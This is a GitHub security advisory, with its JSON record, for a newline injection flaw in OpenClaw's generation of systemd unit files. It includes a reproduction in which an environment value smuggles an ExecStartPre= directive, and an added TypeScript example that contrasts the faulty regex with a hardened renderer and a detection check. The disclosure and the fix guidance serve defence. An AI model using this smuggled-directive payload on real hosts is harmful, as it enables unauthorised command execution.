GHSA-VFFC-F7R7-RX2W

Vulnerability from github – Published: 2026-03-03 21:52 – Updated: 2026-03-16 21:51
Summary
OpenClaw Improperly Neutralizes Line Breaks in systemd Unit Generation Enables Local Command Execution (Linux)
Details

Summary

A command injection vulnerability exists in OpenClaw’s Linux systemd unit generation path. When rendering Environment= entries, attacker-controlled values are not rejected for CR/LF, and systemdEscapeArg() uses an incorrect whitespace-matching regex. This allows newline injection to break out of an Environment= line and inject standalone systemd directives (for example, ExecStartPre=). On service restart, the injected command is executed, resulting in local arbitrary command execution (local RCE) under the gateway service user.


Details

The issue is in src/daemon/systemd-unit.ts:

  • renderEnvLines(...) builds: Environment=${systemdEscapeArg(`${key}=${value}`)}
  • No CR/LF validation is enforced for environment keys/values before writing unit lines.
  • systemdEscapeArg(...) uses the regex /[\\s"\\\\]/. In this regex, \\s is interpreted as a literal backslash + s, not a whitespace character class. As a result, whitespace detection/quoting behavior is incorrect.

Because systemd parses unit files line-by-line, a newline inside an environment value can inject an additional directive line. Example rendered output:
Environment=INJECT=ok
ExecStartPre=/bin/touch /tmp/oc15789_rce

At restart time, systemd executes ExecStartPre, enabling command execution.

Relevant code path/components involved in the exploitation chain:
  • src/daemon/systemd-unit.ts
  • src/commands/daemon-install-helpers.ts
  • src/config/env-vars.ts
  • src/config/zod-schema.ts

Trigger conditions:
  1. Attacker can influence config.env.vars (directly or indirectly).
  2. Install/reinstall path is invoked to write/update the unit.
  3. Service restart occurs (systemctl --user restart ...).
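The regex defect and the missing CR/LF check described above, as an added example that is not OpenClaw's code: a naive renderer using the advisory's regex is placed beside a hardened renderer that rejects line breaks before any escaping, plus a check a reviewer can run over generated unit text to spot a value that has escaped its line. The function names, the key validation, the quoting scheme in escapeUnitArg and the constructed input are assumptions for illustration, not the project's implementation.

```typescript
// Added example, not OpenClaw's code: the regex defect from the advisory next to a
// hardened renderer. Function names, key validation and quoting scheme are assumptions.

// Regex as quoted in the advisory. Inside a regex literal, `\\s` is an escaped
// backslash followed by a literal `s`, so this class matches `\`, `s` and `"`,
// and never matches a space, tab or newline.
const BUGGY_SPECIAL = /[\\s"\\\\]/;

// Intended form: `\s` is the whitespace class, `\\` a single literal backslash.
const FIXED_SPECIAL = /[\s"\\]/;

function buggyNeedsQuoting(arg: string): boolean {
  return BUGGY_SPECIAL.test(arg);
}

function fixedNeedsQuoting(arg: string): boolean {
  return FIXED_SPECIAL.test(arg);
}

// Naive renderer (hypothetical): no line-break check, buggy regex. A value that
// carries a newline is written through, and systemd reads the unit line by line.
function renderEnvLinesNaive(vars: Record<string, string>): string[] {
  return Object.keys(vars).map((key) => {
    const arg = `${key}=${vars[key]}`;
    const rendered = buggyNeedsQuoting(arg) ? `"${arg}"` : arg;
    return `Environment=${rendered}`;
  });
}

// Hypothetical escaper: double-quote the argument when it holds whitespace,
// a quote or a backslash, escaping the latter two.
function escapeUnitArg(arg: string): string {
  if (!fixedNeedsQuoting(arg)) return arg;
  return `"${arg.replace(/[\\"]/g, (c) => "\\" + c)}"`;
}

// Hardened renderer: validate the key as an environment-variable name and reject
// CR, LF and NUL in the value before any escaping, since quoting cannot keep a
// line break from terminating the directive.
function renderEnvLinesSafe(vars: Record<string, string>): string[] {
  const lines: string[] = [];
  for (const key of Object.keys(vars)) {
    const value = vars[key];
    if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(key)) {
      throw new Error(`invalid environment key ${JSON.stringify(key)}`);
    }
    if (/[\r\n\0]/.test(value)) {
      throw new Error(`environment value for ${key} contains a line break or NUL`);
    }
    lines.push(`Environment=${escapeUnitArg(`${key}=${value}`)}`);
  }
  return lines;
}

// Defender-side check on already generated text: rendering environment variables
// must yield only `Environment=` lines; any other directive means a value broke
// out of its line.
function strayDirectives(rendered: string[]): string[] {
  return rendered
    .join("\n")
    .split(/\r?\n/)
    .filter((line) => /^[A-Za-z]+=/.test(line) && !/^Environment=/.test(line));
}

// Constructed input modelled on the advisory's PoC, with a harmless command.
const CONSTRUCTED_VARS: Record<string, string> = {
  INJECT: "ok\nExecStartPre=/bin/true",
};

function demo(): { naiveStray: string[]; safeRejected: boolean } {
  const naiveStray = strayDirectives(renderEnvLinesNaive(CONSTRUCTED_VARS));
  let safeRejected = false;
  try {
    renderEnvLinesSafe(CONSTRUCTED_VARS);
  } catch (err) {
    safeRejected = true;
  }
  return { naiveStray, safeRejected };
}

console.log(demo());
```

The point of ordering in renderEnvLinesSafe is that the line-break check runs before escaping: a unit-file parser ends a directive at the newline regardless of quoting, so the only safe response to CR/LF in a value is to refuse to write the unit. strayDirectives is the cheap post-hoc check for a reinstall script or test suite: render, then confirm no line other than Environment= came out.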


PoC

Environment: Linux host with systemd user services enabled.

  1. Configure a malicious environment value in OpenClaw config (config.env.vars), including a newline and injected directive:
     • Key: INJECT
     • Value:
       ok
       ExecStartPre=/bin/touch /tmp/oc15789_rce
  2. Install/reinstall the gateway service (fixed port as requested):
     openclaw gateway install --port 15789 --force
  3. Inspect the generated user unit file (default path): ~/.config/systemd/user/openclaw-gateway.service
     Verify that an injected standalone line exists:
     ExecStartPre=/bin/touch /tmp/oc15789_rce
  4. Reload and restart the user service:
     systemctl --user daemon-reload
     systemctl --user restart openclaw-gateway.service
  5. Confirm the command execution side effect:
     ls -l /tmp/oc15789_rce

Impact

This is a local command execution vulnerability in OpenClaw’s systemd unit generation during install/reinstall flows.

  • Type: Command injection via newline/directive injection in unit file generation.
  • Execution context: Runs with the same privileges as the OpenClaw gateway service user.
  • Affected users: Linux deployments using systemd user services where an attacker can control config.env.vars and trigger install/reinstall.

Fix Commit(s)

  • 61f646c41fb43cd87ed48f9125b4718a30d38e84

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.2.19-2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.2.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32063"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T21:52:54Z",
    "nvd_published_at": "2026-03-11T14:16:28Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA command injection vulnerability exists in OpenClaw\u2019s Linux systemd unit generation path.\nWhen rendering `Environment=` entries, attacker-controlled values are not rejected for CR/LF, and `systemdEscapeArg()` uses an incorrect whitespace-matching regex. This allows newline injection to break out of an `Environment=` line and inject standalone systemd directives (for example, `ExecStartPre=`). On service restart, the injected command is executed, resulting in local arbitrary command execution (local RCE) under the gateway service user.\n\n---\n\n### Details\nThe issue is in `src/daemon/systemd-unit.ts`:\n\n- `renderEnvLines(...)` builds:\n- `Environment=${systemdEscapeArg(`${key}=${value}`)}`\n- No CR/LF validation is enforced for environment keys/values before writing unit lines.\n- `systemdEscapeArg(...)` uses:\n- `/[\\\\s\"\\\\\\\\]/`\n- In this regex, `\\\\s` is interpreted as a literal backslash + `s`, not a whitespace character class.\nAs a result, whitespace detection/quoting behavior is incorrect.\nBecause systemd parses unit files line-by-line, a newline inside an environment value can inject an additional directive line. Example rendered output:\n\n```ini\nEnvironment=INJECT=ok\nExecStartPre=/bin/touch /tmp/oc15789_rce\n```\n\nAt restart time, systemd executes `ExecStartPre`, enabling command execution.\n\nRelevant code path/components involved in exploitation chain:\n- `src/daemon/systemd-unit.ts`\n- `src/commands/daemon-install-helpers.ts`\n- `src/config/env-vars.ts`\n- `src/config/zod-schema.ts`\n\nTrigger conditions:\n1. Attacker can influence `config.env.vars` (directly or indirectly).\n2. Install/reinstall path is invoked to write/update the unit.\n3. Service restart occurs (`systemctl --user restart ...`).\n\n---\n\n### PoC\nEnvironment: Linux host with systemd user services enabled.\n\n1. 
Configure a malicious environment value in OpenClaw config (`config.env.vars`), including a newline and injected directive:\n- Key: `INJECT`\n- Value:\n```text\nok\nExecStartPre=/bin/touch /tmp/oc15789_rce\n```\n\n2. Install/reinstall the gateway service (fixed port as requested):\n```bash\nopenclaw gateway install --port 15789 --force\n```\n\n3. Inspect the generated user unit file (default path):\n```bash\n~/.config/systemd/user/openclaw-gateway.service\n```\nVerify that an injected standalone line exists:\n```ini\nExecStartPre=/bin/touch /tmp/oc15789_rce\n```\n\n4. Reload and restart user service:\n```bash\nsystemctl --user daemon-reload\n```\n```bash\nsystemctl --user restart openclaw-gateway.service\n```\n\n5. Confirm command execution side effect:\n```bash\nls -l /tmp/oc15789_rce\n```\n---\n\n### Impact\nThis is a local command execution vulnerability in OpenClaw\u2019s systemd unit generation during install/reinstall flows.\n\n- **Type:** Command injection via newline/directive injection in unit file generation.\n- **Execution context:** Runs with the same privileges as the OpenClaw gateway service user.\n- **Affected users:** Linux deployments using systemd user services where an attacker can control `config.env.vars` and trigger install/reinstall.\n\n## Fix Commit(s)\n- `61f646c41fb43cd87ed48f9125b4718a30d38e84`",
  "id": "GHSA-vffc-f7r7-rx2w",
  "modified": "2026-03-16T21:51:52Z",
  "published": "2026-03-03T21:52:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vffc-f7r7-rx2w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32063"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/61f646c41fb43cd87ed48f9125b4718a30d38e84"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-command-injection-via-newline-in-systemd-unit-generation"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw Improperly Neutralizes Line Breaks in systemd Unit Generation Enables Local Command Execution (Linux)"
}

